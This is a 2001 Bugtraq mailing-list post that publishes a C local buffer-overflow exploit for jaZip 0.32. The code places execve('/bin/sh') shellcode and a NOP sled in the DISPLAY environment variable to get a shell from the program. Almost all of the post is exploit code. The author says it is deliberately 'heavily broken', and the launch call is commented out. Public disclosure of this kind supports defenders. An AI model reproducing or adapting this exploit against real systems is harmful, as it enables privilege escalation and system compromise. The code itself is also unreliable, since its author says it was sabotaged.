jazip 0.32 local exploit
Date: Fri, 26 Jan 2001 01:05:42 -0000
From: n33dl3r <n33dl3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: jazip 0.32 local exploit
Hi folks!
In between of heavy gaming i dished up this tiny
exploit for jaZip!
Educational purposes only. Please dont abuuuse.
Hi mum, gimme some food damnit!
-- [snip - jazip-exp.c] --
/*
* jaZip-0.32 local buffer overflow exploit
(tested on debian)
*
* usage is: ./jazip-exp <offset> <align>
* offset: 1500 x N (where N is positive or
negative number)
* align: 1-3 (0 is def.)
*
* This exploit is heavily broken, to prevent
scriptkiddie abuse!
* Thanks to d-blood for helping me with the
shellcode.
*
* c0ded by: needler @ efnet
<n33dl3r@hotmail.com>
*
* Oh btw.. fuck college, I'm gonna be a pro CS
player.
*/
#include <stdio.h>
#include <stdlib.h>
#define BSIZE 2080
#define NOPS 1500
char shellcode[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
int
main(int argc, char **argv, char **envp) {
char overflow[BSIZE];
int i, align = 0, offset = 0;
u_long addy = 0xbffff9e5;
if( argc > 1) offset = atoi(argv[1]);
if( argc > 2) align = atoi(argv[2]);
memset(overflow, 0x90, BSIZE);
memcpy(&overflow[NOPS], shellcode,
strlen(shellcode));
memcpy(overflow, "DISPLAY=", 8);
for( i = (NOPS + strlen(shellcode)); i < BSIZE;
i += 4)
*(long *)&overflow[i+align] = addy +
offset;
envp[0] = overflow;
printf("Using address 0x%x\n", addy + offset);
// execl("/usr/X11R6/bin/jazip", "jazip", NULL);
}
-- [snip - jazip-exp.c] --
Terrorists win! (damn i lub CS)
---
yours truly,
needler
